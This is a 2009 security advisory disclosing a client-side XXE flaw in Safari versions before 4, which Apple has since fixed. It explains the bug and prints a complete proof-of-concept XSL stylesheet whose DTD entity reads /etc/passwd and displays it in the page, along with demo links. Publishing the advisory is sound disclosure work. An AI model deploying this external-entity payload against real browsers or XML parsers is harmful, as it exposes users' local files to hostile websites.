CESA-2009-006 - rev 1
[See all my vulnerabilities at
http://scary.beasts.org/security]
[Blog if you want to subscribe to new findings is at
http://scarybeastsecurity.blogspot.com/]
Apple Safari local file theft bug
Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008
Safari was vulnerable to an XXE attack against a relatively obscure area of
XML parsing. As a recap, XXE (Xml eXternal Entity) attacks abuse a built-in
feature of XML to fetch files (or network resources) and embed them in an
attacker's document. XXE attacks are most common server-side; this advisory
notes a client-side attack against the Safari browser.
Safari's XSL stysheets were vulnerable to XXE attacks. By having a random
XML file refer to an evil XSL resource (which is itself an XML-based format),
the attacker can steal a local file by refering to it in the XSL resource's
DTD.
Here's the code for the evil DTD:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
Demos
Click
here for Safari 3 / MacOS
Click
here for Safari 3 / Windows
Credits
- Google - found on Google's time. Be aware that nothing on my personal
pages or blog represents Google... obviously.
CESA-2009-006 - rev 1
Chris Evans
scarybeasts@gmail.com